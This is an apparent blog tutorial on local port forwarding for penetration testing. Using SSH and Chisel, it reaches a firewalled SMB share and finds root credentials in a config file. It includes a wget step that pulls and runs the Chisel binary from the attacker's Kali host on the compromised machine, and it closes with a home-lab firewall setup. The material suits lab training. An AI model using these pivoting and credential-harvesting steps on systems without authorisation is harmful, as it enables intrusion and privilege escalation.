Port forwarding is a networking technique that involves redirecting traffic from one network location to another. In the context of penetration testing, it is often used to forward ports from the victim’s machine to the attacker’s machine. This allows the attacker to access resources on the victim’s computer directly from their own machine, which would otherwise be inaccessible to others on the network.
This post focuses on local port forwarding, which can be used when certain ports are blocked from the external network. For example, a port may be blocked to limit access to internal resources or to prevent a webpage from being accessed externally before it’s ready. However, if an attacker gains access to the victim’s machine, they can forward the blocked port and investigate the resources running on it.
For instance, if an attacker gains user-level access to a machine and discovers that port 80 is running locally but was not detected in their initial scan, it’s likely that a firewall blocked their Kali machine from accessing it. With access to the victim’s machine, the attacker can forward port 80 to their Kali machine and examine the resources running on that port.
What you’ll learn
- Different ways privilege escalation might occur through port forwarding
- How to forward ports with Chisel
- How to forward ports with SSH
Privilege Escalation through Port Forwarding
These are some ways you might be able to escalate privileges through different ports:
- Port 80: We can potentially access sensitive information such as credentials or configuration files. We might even be able to get RCE directly from the site if the site has vulnerabilities.
- Port 445: Server Message Block (SMB) is a protocol used for file sharing and remote administration. Forwarding this port to Kali allows us to access potentially sensitive files.
SSH
I’m going to go over two different ways to forward ports from a Linux machine to Kali. This first method will be through SSH.
First, lets do an nmap scan to see the open ports:
nmap -p- --min-rate=10000 192.168.4.3
Scenario: We enumerated port 80 and found ssh credentials which we logged into the Linux machine with. Our next goal is to escalate privileges.
After some enumeration, we find that port 445 is running locally on the Linux machine. We didn’t see port 445 open on our initial scan.
ss -ltn
Lets forward this port to Kali using SSH
ssh -N -L 0.0.0.0:445:<UBUNTU_IP>:445 linuser1@<UBUNTU_IP>
Lets try to access port 445 from kali using the ssh credentials we previously found. There’s a share named “secrets”.
smbclient -L '//127.0.0.1/' -U 'linuser1' -p
In the share, there seems to be a file called “root.conf”
smbclient '//127.0.0.1/secrets' -U 'linuser1' -p
Reading the file, we can see that there are hard-coded credentials
Testing these credentials on ssh gives us access as root
Chisel
Scenario: We’ve gotten a shell as linuser1 and we’re trying to forward 445 again.
Download chisel from here if you haven’t already
Now host a python webserver on Kali where the chisel binary is located
python3 -m http.server 80
On the Ubuntu machine, we can use wget to bring the binary over.
wget http://192.168.4.4/chisel chisel
Then, we use chmod to give it proper permissions so we’re able to execute it.
chmod 700 chisel
Before we run the chisel client on the Ubuntu machine, we should start the chisel server on Kali
Now we can run chisel with these arguments
./chisel client [remote-host]:[remote-port] [local-port]:[local-host]:[local-port]
Now we’re able to access the smb shares hidden behind a firewall from our Kali.
NOTE: I’m not going to go over the actual privilege escalation part since that was shown in the previous section.
Replicate
In this section, I’ll be demoing how to block a port in Linux so you can replicate port forwarding in your home lab.
First, update the machine
sudo apt updateThen, we need to download UncomplicatedFirewall (UFW)
sudo apt install ufw -yOnce its installed, you need to enable it
sudo ufw enableNow we have to change some rules. By default, ufw denies all machines from interacting with ports so this first rule will set the default to allow
sudo ufw default allowThe second rule will drop any connections to port 445
sudo ufw reject 445/tcpYou can also block NetBios (port 139)
sudo ufw reject 139/tcpMake sure to reload the firewall
sudo ufw reloadAll the ports on Ubuntu except for port 445 should be open.
Thanks for reading! If you found this post useful, be sure to share it!
